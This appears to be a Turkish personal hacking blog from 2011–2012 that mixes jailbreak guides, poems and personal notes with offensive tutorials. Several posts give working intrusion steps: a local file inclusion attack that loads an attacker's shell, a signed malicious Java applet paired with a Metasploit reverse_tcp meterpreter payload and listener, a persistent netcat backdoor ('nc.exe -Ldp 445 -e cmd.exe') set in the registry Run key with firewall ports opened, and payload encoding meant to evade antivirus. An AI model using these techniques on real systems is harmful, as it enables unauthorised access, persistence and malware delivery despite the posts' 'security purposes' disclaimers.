Azıcık Ordan Azıcık Burdan

BackTrack 5 R1 ( harikalar birleşimi )

2012-02-14T15:57:00.000-08:00

Remote Exploit grubu her seferinde bt yi dahada güçlendirerek sürüm çıkarıyor. BT5 R1 Sürümü tavsiyemdir. kde ve gnome(desktop) şeklinde indirebilirsiniz. Benim pek işime yaramasada içersindeki Gerix çok işinize yarayacaktır . Tanıtım videosu ve indirme linki aşağıda .

indir

BackTrack 5 - Penetration Testing Distribution from Offensive Security on Vimeo.

iphone 4s ve ipad2 untether jailbreak

2012-01-21T14:58:00.000-08:00

Cronic dev team üyesi pod2g ve rüya takımı sonunda coronayı a5 işlemcili telefonlara uygulamayı başardı.
Windows Makineler için ;
yazılımı indir
yazılımı indirdikten sonra içersindeki dosyaları c:\ konumuna atınız.
telefonu hiç bir şekilde dfu moduna almanız gerekmiyor . telefonun tuş kilidini açın ve pc ye bağlayın ; vista ve win7 makineler için başlata cmd yazdıktan sora cmd.exe yi yönetici olarak çalıştırınız . komutları sırası ile yazıyorum açıklamaya gerek yok diye düşünüyorum ;

cd ../.. ( yönetici çalıştırdığınız için windows system32 dizinine atacaktır amaç c konumuna ulaşmak )
cinject.exe -i payloads/jailbreak.mobileconfig yazın ve entere basın ( bu komutu uyguladıktan hemen sonra vpn jailbreak yükle diye bir uyarı çıkacak telefonun ekranında onu uygulayın şifre sorarsa boş geçin . )
kurulumu yaptıktan hemen sonra ;
cinject.exe -j payloads komutunu uygulayın işlem bittikten sora ayarlar menusune gelen vpn yi aktif edin telefon kapanıp yeniden açılınca jailbreaklanmış olacak. son işlem cydia yı çalıştırın ve işlemin tamamlanmasını bekleyin.

MacOs pc ler için greenp0isonun yazılımı kullanın

telefonu pc ye bağlayın programı açın ve jailbreak tuşuna basın bütün işlemi program yapacak

macos için indir

Bu döküman FreWaL tarafından yazılmıştır.

ProFTPD, FreeBSD FTPD Remote Root Exploit

2012-01-05T14:36:00.000-08:00

FreeBSD 6.2 ve 8.2 arası i386(32bit) ve amd64(64bit) sistemlerde çalışan, FTPD ila ProFTPD servislerinde bir güvenlik açığı yayımlandı. Exploitin çalışabilmesi için hedef sunucuda bir hesap olması yeterli.

Exploitin Detayları

ios 5.0.1 ve ios 5.0 Untethered Jailbreak ( a4 işlemcili telefonlar )

2011-12-30T07:47:00.000-08:00

Geçtiğimiz günlerde ios 5.0.1 de bulduğu güvenlik açığı ile süsmü untethered jailbreaklemeyi basaran pod2g elindeki açığı redsn0w ve devteam ile paylaştı. böylece iphone 4s ve ipad2 dışındaki tüm telefonların ios 5.0.1 versiyonu %100 jailbreak olayına kavuşmuş oldu. 4s ve ipad 2 için halen bir gelişme bulunmuyor.

Telefonunuzu iki şekilde untethered hale getirebilirsiniz ;

1. yol cydiadan " corona 5.0.1 untether " indirip kurabilirsiniz.

2. yolu ise redsn0w 0.9.10b1 sürümünü indirerek sistemi yeniden kurabilirsiniz.

detaylı bilgi ve video için Redsn0w resmi sitesi

( thank you pod2g redsn0w and dev-team )

Geri Sayım Başladı . . .

2011-12-12T17:28:00.001-08:00

Son 17 . . .

26.11.2011

2011-11-25T17:49:00.001-08:00

Bugun baktımda 8. seneyi geride bıraktık. Çoğu dostumuz haksız yere zarar gördü kendilerine geçmiş olsun dileklerimizi ulaştıramazsakda ailelerine sabır diliyoruz . Zaman su gibi akmaya devam ediyor . Belki birgün dönerim . selametle.

Hayat bu işte

2011-10-03T16:57:00.001-07:00

Bazen susmanın ve konuşmamanın en büyük erdem olduğunu düşünüyorum . o yüzden nadirende olsa buraya yazmayı seviyorum. Allaha emanet.

Ölüm ben dert okyanusuyum dalga geçme benle.

2011-08-23T09:02:00.000-07:00

Acaba üstünde olduğum bu ip beni ne kadar taşır?
Gittikçe ağırlaşıyorum huzurla vedalaşıp.
Yokluğunu izliyorum gözümdeki harabeden
Üstünde olduğum ip bigün boynumu kaşır.

Yanaştığım her saniye uzaklığını gördüm.
Kaderin örümceği ağını sinsice ördü.
Birgün öleceğiz lakin; kadere af buyurup.
itiraz ediyorum: Körsem niye ölümü gördüm?

Kimisi söndü, kimi hiç yanmamış,
Kimine sevgi bi güneş gibi gelip henüz kararmamış.
Ben bi parça ışığa hasretim yıllardır.
Bu yüzden her satırım; diz çöküş, bi nevi yalvarış.

Birgün karşıma çık yeni bi senle tanıştır.
Zaman mühim değil nasılsa sensizliğe alıştım.
Nasıl sağ elim kaleme mecbur ise,
Aşk diyetinde olsan dahi, beni arada sırada atıştır.

Direncim yok hayata umrumda değil yarın
Eğer sesini duymayacaksam yaşamı yok sayarım!
Başkasının evinden gelen çığlıklarına sağırım
Tadına bakamadığım için sana takıldı kursağım

Canciğer dediklerimiz aratmıyor düşmanı
Annem şu halimi görse yeni ....’ı güç tanır.
Gayret ediyorum da bir parça yok canım
Bir parçada beni anlasanız toplar giderim bohçamı..

Keşfemediğim denizin en nanide incisi
Senin cennette olman ayakta tutuyor bilincimi.
Bana eminim ordan diyosundur ki
Ya çözüp gel artık şu yalan hayat kelepçeni

Rabbe verdim dilekçemi ama malesef yaşıyorum.
Seni omzuma verdi annem dediki taşı onu.!
Taşı ki mutlu olsun onu cennete yolcula.
Ama eminim o cennette bile yokluğumu yaşıyodur.

Bir dünya hayalet ben yaşayan hayalet
Hayatım duman ateş su,bir de senden ibaret.
ölüm bi kehanet – Allahtan ve senden sonra
anam , babam ve kardeşim bana emanet.

Bu en hakiki ihanet olsa unutur gidersin.
Lan kardeşin toprak altındayken nası rahat edersin.
16 temmuz cuma gününden bu yana tek isteğim.
Bir gece gel rüyama nolur biraz durup gidersin.

Herkes tastamanda peki ya o nerde?
Nefes aldığım sürece onun kanı kalmaz yerde.
En vicdanlı satırlarım şuan amade emrine.
Ölüm ben dert okyanusuyum dalga geçme benle.

Hiç inanmadım öldüğüne halada inanmıyorum.
Öldüğünü duyduğum andan beri nefes almıyorum.
Çöle sağnak yağış gibi sana duyduğum hisler!
Yokluğunu bahane edip hertürlü çamura bulanıyorum.!

Şimdi napıyosun acaba tam şuanda.
Ben seni içime hapsettim işte bak tam şuramda.!
Dua edip kondisyon yapıyorum şu sıra
Çünkü tepesinde saklıyo seni ölüm denen şu rampa!

Bak şunu anla ! .... seninle öldü!
Belkide dünyada bitek ben yaşarken ölümü gördüm!
Seni tek bi seferde anlatmak ne haddime!
O yüzden seni toprağa değil cennete mektuplara gömdüm !

Hayat bu kadar ince bir çizgi işte.
Ben bu çizgiden daha kalın olduğum için yazıyorum.
Ve yazdığım için yaşıyorum.
Şu cılız halime bakmayın..
Ben omzumda dünyaları taşıyorum.
İsyanım haşa Allah’a değil ama benim sabır bardağım göz yaşıyla dolu ve bende mecbur böyle arada sırada taşıyorum.

Farklı Sitelerdeki FreWaL Üyelikleri ile alakalı.

2011-08-14T15:06:00.001-07:00

Googlede saçma sapan üyelikleri görmekten sıkıldım . Hiç bir sitede üyeliğim bulunmamaktadır çakmalarımdan sakının.

Görüşürük.

Melankolia

2011-06-18T13:57:00.000-07:00

Bu zamana kadar harama el uzatmadım uzatmayacağımda . Ne yazıkki para olmayınca değerde pek olmuyor . Varsın olmasın Hepimiz biliyoruzki aşkta birgün biter arkasından kalan bir kaç kelime ve gözyaşı ne yazıktırki bizler ne mecnunuz nede kerem. Ayrica turkiyede issizlerin is bulabilmesi icin Hz. Ömerin Adalet anlayışının oluşması gerekiyor sanırım :) oda biraz zor görünüyor. Ordan burdan gundeme deyindik.
Selametle.

(SIOCSIFFLAGS) failed: Unknown error 132 hatası ve çözümü

2011-06-11T03:24:00.000-07:00

rtl8187 ve r8187 wireless chipset kullanan arkadaşlar bt4 r2 sürümünden soraki tüm sürümlerde bu hata ile mutlaka karşılaşmıştır. Hata kartın sisteme kayıt edilmeyip kendini kitlemesinden kaynaklanıyor. Çözümü için nette türkçe döküman bulamazsınız. Çözümü çok zor bir hata değil ancak çıldırtan bir hata diyebilirim. hemen yazımıza geçelim

Yazıma başlamadan önce aşağıdaki tüm işlemleri oto yapabilmek için yazdığım döngüyü yayınlamak istiyorum;

Ben bu işten bir halt anlamadım diyen arkadaşlara yararı olacağını düşünerek c ile ufak bir döngü yazdım ( Not : kodlama derlenmiştir. ) . Kendimde bu kartı kullandığım için işlemleri hızlandırdığına inanıyorum.

root@bt:~# wget http://fcoder.googlecode.com/svn/wiki/wiress
root@bt:~# chmod 777 wiress
root@bt:~# ./wiress

şeklinde çalıştırarak seçiminizi yapmanız yeterli olacaktır.

Yok ben bu işmemi manuel yapmak istiyorum diyorsanız

Bu sürücüyü varsayılan olarak yüklemek için ;

Sürücüyü manuel yüklemek için ;

root@bt:~# modprobe rtl8187

Sürücüyü manuel boşaltmak için ;

root@bt:~# rmmod rtl8187

Tüm mac80211 yığınlarını boşaltmak için

root@bt:~# rmmod mac80211
root@bt:~# rmmod cfg80211
root@bt:~# rmmod rfkill

SIOCSIFFLAGS Unknown error 132 ( hatası ve çözümü )

VMware ortamında wireless kartınızı aktif etmeye çalışırken "rtl8187: wireless radio switch turned off", "ioctl(SIOCSIFFLAGS) failed: Unknown error 132" ve "rtl8187 - [phy0]SIOCSIFFLAGS: Unknown error 132"
hataları ile sık sık kaşılaşırsınız bunun sebebi ise kartın kitli olmasından kaynaklı olacaktır . Bu sorunu çözebilmek için ;

Aşağıdaki Komutları vermeniz yeterli olacaktır;

rmmod rtl8187
rfkill block all
rfkill unblock all
modprobe rtl8187
rfkill unblock all
ifconfig wlan0 up

R8187 chipsetli karlar için ise aşağıdaki komutları kullanmanız gerekecek;

rmmod rtl8187
rmmod mac80211
rmmod cfg80211
rmmod rfkill

Bu döküman FreWaL tarafından yazılmıştır.

Local Path include Güvenlik Zahafiyeti

2011-06-05T04:49:00.000-07:00

Sistemlerde Masum görünen ufak kodlar büyük açıklara sebebiyet verebiliyor. Çoğu kişiye ismi değişik gelsede zaman zaman denk geldiğim Local Path include zahafiyetinden bahsetmek istiyorum . Geçenlerde bir sitenin güvenliği test ederken barındığı makinenin iyi yapılandırılmış olduğunu gördüm . Sistem iyi optimize edilmişti çünkü güncellemeleri sağlamdı , yinede bazı zahafiyetler aracılığı ile sistem dosyaları okunabiliyordu yazma izni ise yoktu .

Siteye kısa bir göz gezdirdikten sonra Hedef sitedeki ufak bir link yapısı gözüme ilişti
index.php?sayfa=iletisim
Sözde codırcıkların yaptığı yanlış bundada mevcutmu diyerek hata verdirme yoluna gittim.
index2.php?sayfa=' // Tabi düşündüğüm gibi çıktı.

Warning: include(\'.php) [function.include]: failed to open stream: No such file or directory in /home/XXX/public_html/index.php on line 54

Warning: include(\'.php) [function.include]: failed to open stream: No such file or directory in /home/XXX/public_html/index.php on line 54

Warning: include() [function.include]: Failed opening '\'.php' for inclusion (include_path='.:/usr/lib/php:/usr/local/lib/php') in /home/XXX/public_html/index.php on line 54

Çoğunuza masum gelen bu hatadan bahsetmek istiyorum. Bu siteyi yapan arkadaş include fonksiyonu ile dosyaları okutmuş ve demişki benim ismini verdiğim dosyanın sonuna .php koyarak oku.

Failed opening '\'.php'

// mantıken olay şöyle oluyor. Link yapısını hatırlıyorsunuz ; index.php?sayfa=iletisim
Sunucu kontrol edildiği zaman iletisim.php adında bir dosyanında aynı dizinde olduğunu görüyoruz. yani arkadaş öyle bir fonksiyon kullanmışki index.php?sayfa=iletisim şeklinde linke giriş yapıldığı zaman sistem onu index.php?sayfa=iletisim.php şeklinde algılıyor ve çıktı veriyor. Ancak herhangi bir filtreleme varmı yokmu bilmediğim için sisteme müdahale edemiyordum.
Tabi o dosyayı okudum ;

<?php
    if(isset($_REQUEST['sayfa'])){
        include $_REQUEST['sayfa'].".php";
    } else {
        include "anasayfa.php";
     }
?>

phpden anlayan arkadaşlar saçmalıklar komedyasını ilk bakışta anlamışlardır. zira bu arkadaş şu ".php"; kısmıda kullanmamış olsa remote file include açığıda verecek.

Fonksiyon include $_REQUEST['sayfa'].".php"; şeklinde kullanıldığı için uzak sunucudan okutmaya imkan tanımıyordu . Peki ne yapılabilirdi ? Öncelikle kendi bulunduğumuz dizindeki php dosyasını sunucudaki farklı bir usere okutabilmek için kendi dizinimize full yetki vermemiz gerekiyordu. ( chmod 777 )
şimdi kendi Local Path konumumuzu muhafaza edelim örneğin : /home/saldirgan/public_html/shell.php
hemen ardından yapılacak ufak bir url include işlemi ;

index.php?sayfa=/home/saldirgan/public_html/shell

URL İnclude işlemi ile sistem onu include "/home/saldirgan/public_html/shell.php"; şeklinde tanımayacak ve çıktı verecek.

Ve artık full yetki ile o siteye erişimi kendimize açmış olduk ve hedef sistemi full yetki ile bypass etmeyi başardık.

Bu Döküman Güvenlik Amacı ile FreWaL Tarafından yazılmıştır.

MSF ile Java Applet Infected işlemi.

2011-06-04T05:46:00.000-07:00

Günümüzde pc'sinde java bulundurmayan pek az insan kalmıştır . Bugunkü konumuzda msf yardımı ile java applet Infected işlemini göreceğiz. Not : Bu yazı tamamen güvenlik amaçlıdır.

Infected işlemi illa msf ile yapılacak diye bişey yok bizimkisi işlem kolaylaştırmadan kaynaklanıyor. Konumuza girişelim ,
Öncelikle java sdk kurulu değil ise kurmanız gerekiyor. Aksi halde derleme işlemini yapamazsınız.
Ubuntu için : apt-get install sun-java6-jdk
Centos için : yum install sun-java6-jdk
Kurulum dağarcığı bulunmayan işletim sistemleri için manuel kurulum gerçekleştirmeniz gerekecek.

Nasıl derleyecez ne komut kullanacaz gibisi dertlerden sizi kurtaracak bash scriptide veriyorum.

#!/bin/bash
#   
#   Shell script to sign a Java Applet   
#   Joshua "Jabra" Abraham  
#   Tue Jun 30 02:26:36 EDT 2009
#
#   1. Compile the Applet source code to an executable class. 
#
#       javac HelloWorld.java
#
#   2. Package the compiled class into a JAR file.
#
#       jar cvf HelloWorld.jar HelloWorld.class
#
#   3. Generate key pairs. 
#
#       keytool -genkey -alias signapplet -keystore mykeystore -keypass mykeypass -storepass mystorepass
#
#   4. Sign the JAR file. 
#
#       jarsigner -keystore mykeystore -storepass mystorepass -keypass mykeypass -signedjar  SignedHelloWorld.jar HelloWorld.jar signapplet
#
#   5. Export the public key certificate. 
#
#       keytool -export -keystore mykeystore -storepass mystorepass -alias signapplet -file mycertificate.cer
#
#   6. Deploy the JAR and the class file. 
#
#        
#
echo "Lütfen dizindeki java ismini giriniz (.java uzantısı olmadan ) :"
read NAME
javac $NAME.java
if [ $? -eq 1 ] ; then
    echo "javac hatası."
    exit
fi

echo "[+] Packaging the compiled class into a JAR file"
echo "
##################################################################################################
# Örnek Kullanım :                                                                              
# What is your first and last name? ( Ad Soyad )
#  [Unknown]:  MSFcmd
# What is the name of your organizational unit? ( Organizasyon )
#  [Unknown]:  Java Inc.
# What is the name of your organization? ( Organizasyon )
#  [Unknown]:  Java Organization
# What is the name of your City or Locality? ( Şehir )
#  [Unknown]:  Redmond
# What is the name of your State or Province? ( Konum )
#  [Unknown]:  Washington
# What is the two-letter country code for this unit?
#  [Unknown]:  yes
# Is CN=MSFcmd, OU=Microsoft, O=Microsoft Organization, L=Redmond, ST=Washington, C=yes correct?
#  [no]:  yes
##################################################################################################
"
jar cf $NAME.jar $NAME.class
if [ $? -eq 1 ] ; then
    echo "Error with jar"
    exit
fi

echo "[+] Generating key pairs"
keytool -genkey -alias signapplet -keystore mykeystore -keypass mykeypass -storepass mystorepass
if [ $? -eq 1 ] ; then
    echo "Error with generating the key pair"
    exit
fi

echo "[+] Signing the JAR file"
jarsigner -keystore mykeystore -storepass mystorepass -keypass mykeypass -signedjar  "Signed$NAME.jar" $NAME.jar signapplet
if [ $? -eq 1 ] ; then
    echo "Error with signing the jar"
    exit
fi

echo "[+] Exporting the public key certificate"
keytool -export -keystore mykeystore -storepass mystorepass -alias signapplet -file mycertificate.cer
if [ $? -eq 1 ] ; then
    echo "Error with exporting the public key"
    exit
fi

echo "[+] Done"
sleep 1
echo ""
echo ""
echo "Deploy the JAR and certificate files. They should be deployed to a distribution directory on a Web server. "
echo ""
echo " " 
echo ""

Fazla kuru kalabalıktan kurtulmak için boş bir dizin açalım. ve içersine gidelim.

root@bt : mkdir java && cd java

nano komutu kullanarak MSFcmd.java adında bir dosya oluşturalım ve verdiğim kodları içersine yazdıktan sora dosyadan çıkış yapalım.

import java.applet.*;
import java.awt.*;
import java.io.*;
public class MSFcmd extends Applet {
public void init() {
Process f;
String first = getParameter("first");
try {
f = Runtime.getRuntime().exec("first");
}
catch(IOException e) {
e.printStackTrace();
}
Process s;
}
}

Buraya kadar işlem başarı ile gerçekleştirildi. şimdi nano komutu ile javabuild.sh adında bir dosya açalım ve yukarda verdiğim bash script kodlarını içersine kopyalayalım. ( bilmeyen arkadaşlar için söylüyorum bash scriptin adı illaki javabuild olacak diye bişe yok. )

bulunduğunuz dizinde ; bash javabuild.sh yada ./javabuild.sh şeklinde çalıştıralım.
Script ingilizce olduğu için türkçe örnek kullanım alanı ekledim .

root@bt:~/Desktop/Exploit/java/applet# bash javabuild.sh
Lütfen dizindeki java ismini giriniz (.java uzantısı olmadan ) :
MSFcmd
[+] Packaging the compiled class into a JAR file

##################################################################################################
# Örnek Kullanım :                                                                              
# What is your first and last name? ( Ad Soyad )
#  [Unknown]:  MSFcmd
# What is the name of your organizational unit? ( Organizasyon )
#  [Unknown]:  Microsoft
# What is the name of your organization? ( Organizasyon )
#  [Unknown]:  Microsoft Organization
# What is the name of your City or Locality? ( Şehir )
#  [Unknown]:  Redmond
# What is the name of your State or Province? ( Konum )
#  [Unknown]:  Washington
# What is the two-letter country code for this unit?
#  [Unknown]:  yes
# Is CN=MSFcmd, OU=Microsoft, O=Microsoft Organization, L=Redmond, ST=Washington, C=yes correct?
#  [no]:  yes
##################################################################################################

[+] Generating key pairs
What is your first and last name?
  [Unknown]:  Bili Amca
What is the name of your organizational unit?
  [Unknown]:  Java Inc.
What is the name of your organization?
  [Unknown]:  Java Inc.
What is the name of your City or Locality?
  [Unknown]:  America
What is the name of your State or Province?
  [Unknown]:  Amerika
What is the two-letter country code for this unit?
  [Unknown]:  yes
Is CN=Bili Amca, OU=Java Inc., O=Java Inc., L=America, ST=Amerika, C=yes correct?
  [no]:  yes

[+] Signing the JAR file

Warning: 
The signer certificate will expire within six months.
[+] Exporting the public key certificate
Certificate stored in file 
[+] Done


Deploy the JAR and certificate files. They should be deployed to a distribution directory on a Web server.

Şuanda build işlemi başarı ile gerçekleşti derlenmiş applet işlemi yaptığınız dizinde oluşturuldu.

-rwxr-xr-x 1 root root 3105 2011-06-04 15:14 javabuild.sh
-rw-r--r-- 1 root root 615 2011-06-04 15:23 MSFcmd.class
-rw-r--r-- 1 root root 858 2011-06-04 15:23 MSFcmd.jar
-rw-r--r-- 1 root root 274 2011-06-04 14:37 MSFcmd.java
-rw-r--r-- 1 root root 793 2011-06-04 15:24 mycertificate.cer
-rw-r--r-- 1 root root 1268 2011-06-04 15:24 mykeystore
-rw-r--r-- 1 root root 2153 2011-06-04 15:24 SignedMSFcmd.jar

Buraya kadar işlem tamam . şimdi gerekli dosyaları hostmuza gönderelim. Ben işlemi local gerçekleştirdiğim için localhost üzerinden işlem yapacağım.Aynı dizinde oluşan SignedMSFcmd.jar ve MSFcmd.class dosyasını hostumuza gönderelim testi local yapıyorsanız cp komutunu kullanabilirsiniz . Hemen ardından msfpayload generatorü kullanarak ters bağlantı için exe'mizi oluşturalım.

root@bt:/pentest/exploits/framework3/# ./msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.3 LPORT=443 R | ./msfencode -t exe -o ben.exe

Buraya kadar işlem tamam ise son olarak html dosyamızı oluşturmamız gerekiyor.

HTML Kaynağını alttaki URL den alınız.
http://pastebin.com/pYWibqZu

Html içersindeki ben.exe ve http://192.168.1.3/ben.exe kısmını kendinize göre düzenleyiniz.ve Hostunuza yükleyiniz. kurbanı URL ye çekmeden önce multi handleri kullanarak bağlantıları dinlemeye almamız gerekiyor.

msf > use exploit/multi/handler
msf exploit(handler) > set ExitOnSession false
ExitOnSession => false
msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST 192.168.1.3
LHOST => 192.168.1.3
msf exploit(handler) > set LPORT 4444
LPORT +> 4444
msf exploit(handler) > save
Saved configuration to: /root/.msf3/config
msf exploit(handler) > exploit -j
[*] Exploit running as background job.
[*] Started reverse handler
[*] Starting the payload handler...

 msf exploit(handler) >
 [*] Sending stage   (718336 bytes)
 [*] Meterpreter session 1 opened (192.168.1.4:4444 -> 192.168.1.4:44477)
 msf exploit(handler) > oyun bitti.

session açıldı ve artık makinadayız.

Bu döküman Güvenlik amacı ile FreWaL Tarafından yazılmıştır.

Kandiliniz Mübarek olsun.

2011-06-02T15:43:00.001-07:00

Bu gece kandil gecesi cümleten hayırlara vesile olması dileği ile.

Netcat ile Kalıcı Backdoor ( )

2011-06-02T02:41:00.000-07:00

Bugunkü yazımızda uzak sunucular hakkında bilgi ararken ana sisteme netcat infected ederek güvenlik duvarını bypass etmeyi göreceğiz. Not : Bu yazı içersindeki herşey güvenlik amaçlıdır .
Bu işlemi gerçekleştirebilmek için yapmamız gereken ilk işlem msf'de upload komutu ile netcatı kök sunucuya göndermek olacaktır.

meterpreter > upload /pentest/windows-binaries/tools/nc.exe C:\\windows\\system32
[*] uploading  : /tmp/nc.exe -> C:\windows\system32
[*] uploaded   : /tmp/nc.exe -> C:\windows\system32\nc.exe

bt gerekli tools'ları içersinde zaten bulunduruyor.netcatı indirmek için ek bir çaba gerektirmiyor.

Bu işlemin hemen ardından netcat'ın sistem üzerinde pc'nin her açılışında çalışarak 455 nolu portu dinlemesini sağlamak için kayıt defterinde 'HKLM\software\microsoft\windows\currentversion\run' konumuna girdisini gerçekleştiriyoruz.

meterpreter > reg enumkey -k HKLM\\software\\microsoft\\windows\\currentversion\\run
Enumerating: HKLM\software\microsoft\windows\currentversion\run

  Keys(1): 
 
OptionalComponents

 
Values(1):
 
egui

meterpreter > reg setval -k HKLM\\software\\microsoft\\windows\\currentversion\\run -v nc -d 'C:\windows\system32\nc.exe -Ldp 445 -e cmd.exe'
Successful set nc.
meterpreter > reg queryval -k HKLM\\software\\microsoft\\windows\\currentversion\\Run -v nc
Key: HKLM\software\microsoft\windows\currentversion\Run
Name: nc
Type: REG_SZ
Data: C:\windows\system32\nc.exe -Ldp 445 -e cmd.exe

Bu sayede güvenlik duvarı geçişe ister istemez izin verecek. Zira Güvenlik duvarı kapalı konuma düşecek.

meterpreter > execute -f cmd -i
Process 1604 created.
Channel 1 created.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\Documents and Settings\Administrator>netsh firewall show opmode

Etki Alanı profil yapılandırması:
-------------------------------------------------------------------
Çalışma modu                  = Devre Dışı Bırak
Özel durum modu                    = Etkinleştir

Standard profil yapılandırması (geçerli):
-------------------------------------------------------------------
Çalışma modu                  = Devre Dışı Bırak
Özel durum modu                    = Etkinleştir

Yerel Ağ Bağlantısı güvenlik duvarı yapılandırması:
-------------------------------------------------------------------
Çalışma modu                  = Etkinleştir

sanal güvenlik duvarı yapılandırması:
-------------------------------------------------------------------
Çalışma modu                  = Etkinleştir

Artık hedef makina için 455 nolu port tamamen güvensiz bir moda geçti diyebiliriz.

C:\Documents and Settings\Administrator>netsh firewall add portopening TCP 455 "Service Firewall" ENABLE ALL
Tamam.


C:\Documents and Settings\Administrator>netsh firewall show portopening

Standard profili için bağlantı noktası yapılandırması:
Bağlantı Noktası   İletişim Kuralı  Mod     Ad
-------------------------------------------------------------------
5353   TCP       Etkinle  Adobe CSI CS4
455    TCP       Etkinle  Service Firewall


C:\Documents and Settings\Administrator>netsh firewall show portopening

Standard profili için bağlantı noktası yapılandırması:
Bağlantı Noktası   İletişim Kuralı  Mod     Ad
-------------------------------------------------------------------
5353   TCP       Etkinle  Adobe CSI CS4
455    TCP       Etkinle  Service Firewall


C:\Documents and Settings\Administrator>

İşlem burada tamamlandı . Kök sunucuyu test edebilmek için sistemi yeniden başlatacağız .Çünkü sistem her yeniden başlatıldığında saldırgana girebilmesi için gerekli yolu açacak.

root@bt:# nc -v 88.216.1.9 455
88.216.1.9: inverse host lookup failed: Unknown server error : Connection timed out
(UNKNOWN) [88.216.1.9] 455 (?) open
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\Documents and Settings\Administrator>Oyun Bitti

Bu Döküman FreWaL'tarafından güvenlik amacı ile yazılmıştır.

Fast-Track MsfPayload Generator

2011-05-31T13:49:00.000-07:00

Çoğu zaman msfpayload kullanarak oluşturulan bağlantı şekillerinde hatalı komutlardan ötürü yanlışlıklar meydana gelebiliyor . Fast-Track bu ortamda iyi bir yardımcı olarak kendini gösteriyor . Fast-Track soru/seçenek methodu ile işlemlerinizi hızlı gerçekleştirmenizi sağlıyor.

Başlatıldıktan sonra seçenek yöntemi ile işlemlerinizi gerçekleştirebilirsiniz. Biz bugünkü konumuzda msfpayload'dan bahsedeceğiz ;

1.  Update Fast-Track
2.  Autopwn Automated
3.  MS-SQL Injector
4.  MS-SQL Bruter
5.  Binary to Hex Payload Generator
6.  Mass Client-Side Attack
7.  Exploits
8.  SQLPwnage
9.  Payload Generator
10. Changelog
11. Credits
12. About

9 nolu seçenekteki Payload Generatorden ters bağlantı için yararlanabilirsiniz. Payload generatoru seçtikten sonra Fast-Track sorulara devam edecektir ve ilk sorusu Bağlantı şekli olacaktır ;

What payload do you want to generate:

Name:                                Description:

1. Windows Shell Reverse_TCP         Spawn a command shell on victim and send back to attacker.
2. Windows Reverse_TCP Meterpreter   Spawn a meterpreter shell on victim and send back to attacker.
3. Windows Reverse_TCP VNC DLL       Spawn a VNC server on victim and send back to attacker.
4. Windows Bind Shell                Execute payload and create an accepting port on remote system.

    -c to Cancel

    Enter choice (example 1-6):

Fast-Track 3. Kısımda bağlantı için şifreleme methodu isteyecektir. Buda antileri aşmak için önemli bir seçenektir o yüzden es geçmemekte fayda var yok ben istemiyorum derseniz 14 nolu seçenekten yararlabilirsiniz.

1. avoid_utf8_tolower
2. shikata_ga_nai
3. alpha_mixed
4. alpha_upper
5. call4_dword_xor
6. countdown
7. fnstenv_mov
8. jmp_call_additive
9. nonalpha
10. nonupper
11. unicode_mixed
12. unicode_upper
13. alpha2
14. No Encoding

Method seçildikten sora yazılım ters bağlantı için sizden ip adresinizi ve port numaranızı isteyecektir.Hemen ardından yine 2 seçenek ile karşılaşacaksınız ;

1. Executable
2. Shellcode

1 nolu seçeneği işlerseniz yazılım multi/handler'i kullanarak dinleme işlemine geçecektir. Yok bana shell codemi verin derseniz 2 nolu seçeneği kullanacaksınız.

Bu döküman acemi düzeydeki arkadaşlar için FreWaL Tarafından yazılmıştır.

iPad Hediyeli CTF Ethical Hacking Yarışması

2011-05-31T11:40:00.000-07:00

Konuyu cehturkiyeden okuyabilirsiniz. Geçtiğimiz günlerde başlattıkları yarışmaya çakma bir lakapla katılma fırsatı buldum :) gerçek manada çekişmeli bir yarışma diyebilirim . Ancak işlerim dolayısı ile sürekli takip etme fırsatı bulamıyorum. O yüzden iyi bir noktada elendiğimi zevkle duyuruyorum :) . Herşeye rağmen güzeldi diyorum. detayları aşağıdaki siteden okuyabilirsiniz.

http://www.cehturkiye.com/index.php/2011/05/28/ipad-hediyeli-ctf-ethical-hacking-yarismasi/ipad-hediyeli-ctf-ethical-hacking-yarismasi.html

İstSec İstanbul Bilgi Güvenliği Konferansı kapsamında gerçekleştirdiğimiz CTF oyunu başlamıştır.

CTF Nedir?

Capture The Flag, beyaz şapkalı hackerlar arasında oynanan öğretici bir oyundur. Belirlenen hedefe ulaşmak ve bayrağı(hedef sistemlerde gizli metin dosyası) önce kapmak için sistemlerdeki güvenlik açıklıkları değerlendirilerek bayrağa ulaşılır.

Yarışmanın Amacı

CTF yarışmasının amacı, basit güvenlik hatalarının sonuçlarının nelere malolacağını uygulamalı olarak göstermektir. Yıkıcı bir hacking anlayışından ziyade katılımcının teorik bilgilerini uygulamaya koyması ve çeşitli sistemler arasındaki güvenlik sorunlarını hızlıca bulup değerlendirmesi beklenmektedir.

Capture The Flag Ethical Hacking yarışması Bilgi Güvenliği AKADEMİSİ tarafından Labris Teknoloji ve Net İnternet sponsorluğunda gerçekleştirilmektedir.

Hediyeler

“Yarışmanın birincisine iPad (iPad 16GB Wi-Fi + 3G) hediye edilecektir.”
Yarışmanın ikincisine 500 TL’lik hediye çeki verilecektir.
Yarışmanın üçüncüsüne 250 TL’lik hediye çeki verilecektir.

Katılım Şartları

Yarışmaya katılmak isteyenler http://www.istsec.org/ctf-istsec.pcap dosyasını indirerek başlayabilirler. ctf-istsec.pcap dosyası içerisinden bir sonraki adıma ulaşmak için gerekli ipuçları yer almaktadır.

pcap dosyası bir bankada güvenlik yöneticisi olarak çalışan uzmanın WPA destekli kablosuz ev ağından banka networküne bağlanırken alınmış paketleri içermektedir. Katılımcılardan bankada çalışan güvenlik uzmanının kullandığı WPA ağının parolasını çözüp bağlantı yaptığı paketler içerisindeki gizli ipucunu bulması beklenmektedir.

Bu adımı tamamlayanlar için bir sonraki adım ipucu şeklinde gönderilecektir.

Yarışmayla ilgili gelişmeler ve ipuçları http://friendfeed.com/ctfturkey adresinden yayınlanmaktadır.

Yarışmanın sonuçları http://bit.ly/loQOt2 adresinden takip edilebilir.

Sonuçlar ve Değerlendirme

Yarışmanın kazananı puanlama sistemine göre yapılacaktır. Her adım, zamana bağlı ve çözüm yoluna bağlı bir puan derecesine sahiptir ve belirtilen zaman içerisinde en yüksek puanı alan yarışmayı kazanmış sayılır.

CTF Hakkında detay bilgi için: ISTSEC ’11 CTF

vBulletin , Smf ve WHMCS Şifre Kombinasyonları

2011-05-30T07:01:00.000-07:00

